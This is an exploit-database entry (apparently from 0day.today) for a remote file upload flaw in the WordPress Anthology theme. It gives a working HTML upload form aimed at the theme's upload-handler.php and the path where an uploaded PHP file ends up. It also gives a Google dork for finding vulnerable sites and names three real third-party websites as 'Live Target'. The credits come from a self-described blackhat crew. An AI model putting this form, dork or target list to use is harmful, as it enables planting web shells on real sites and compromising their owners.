id: 21460
date: 11/05/2013
title: WordPress Anthology Themes Remote File Upload Vulnerability
author: Byakuya
cves: 

###################################################################################################
#_________            .___        _______                ___.   .__        
#\_   ___ \  ____   __| _/____    \      \   ______  _  _\_ |__ |__| ____  
#/    \  \/ /  _ \ / __ |/ __ \   /   |   \_/ __ \ \/ \/ /| __ \|  |/ __ \ 
#\     \___(  <_> ) /_/ \  ___/  /    |    \  ___/\     / | \_\ \  \  ___/ 
# \______  /\____/\____ |\___  > \____|__  /\___  >\/\_/  |___  /__|\___  >
#        \/            \/    \/          \/     \/            \/        \/ 
###################################################################################################
# Exploit Title: WordPress Anthology Themes Remote File Upload Vulnerability
# Author: Byakuya
# Date: 11/04/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/anthology-premium-elegant-wordpress-theme/131771
# Price: $35
# Affected Version: v1.1 - v1.4.4
# Infected File: upload-handler.php
# Category: webapps
# Google dork: inurl:/wp-content/themes/Anthology/
# Tested on : Windows/Linux
###################################################################################################

# Exploit & POC :

<form enctype="multipart/form-data" 
action="http://127.0.0.1/wordpress/wp-content/themes/Anthology/functions/upload-handler.php" method="post">
Please choose a file: <input name="pexetofile" type="file" /><br />
<input type="submit" value="upload" />
</form>

#File path: 
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/up.php

#Live Target :
http://carolannjoysalon.com/wp-content/themes/anthology/functions/upload-handler.php
http://mariejo-vannerie.fr/wordpress/wp-content/themes/anthology/functions/upload-handler.php
http://elbaumvideo.com/wp-content/themes/anthology/functions/upload-handler.php

#Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Aiman Ariffin
         ./Official Code-Newbie ./Newbie-Security
#Facebook: https://www.facebook.com/CodeNewbieCrew
#Website: http://www.codenewbie.net
#Malaysia & Indonesia BlackHat
###################################################################################################

#  0day.today [2023-03-24]  #